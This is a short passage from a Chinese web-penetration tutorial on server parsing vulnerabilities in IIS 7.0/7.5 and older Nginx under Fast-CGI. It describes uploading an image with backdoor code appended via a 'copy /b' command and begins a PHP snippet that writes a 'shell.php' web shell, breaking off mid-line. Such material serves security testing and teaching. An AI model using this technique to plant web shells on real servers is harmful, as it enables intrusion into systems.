web渗透--60--web服务器解析漏洞

1、漏洞描述：

服务器相关中间件存在一些解析漏洞，攻击者可通过上传一定格式的文件，被服务器的中间件进行了解析，这样就对系统造成一定危害。常见的服务器解析漏洞涉及的中间件有IIS，apache、nginx等。

2、检测方法

以下为常见的各大web服务器所出现过的解析漏洞汇总，在检测时刻参考：

2.1、IIS 7.0/IIS 7.5/Nginx<8.03

IIS 7.0/IIS 7.5/Nginx<8.03在默认Fast-CGI开启状况下，在一个文件路径（/xx.jpg）后面加上/xx.php会将/xx.jpg/xx.php解析为php文件。

常用利用方法：将一张图和一个写入后门代码的文本文件合并将恶意文本写入图片的二进制代码之后，避免破坏图片文件头和尾:

copy xx.jpg/b + yy.txt/a xy.jpg

/b即二进制 [binary] 模式，/a即 ascii 模式。xx.jpg是正常图片，yy.txt是文件内容。

代码如下：

	fputs(fopen('shell.php',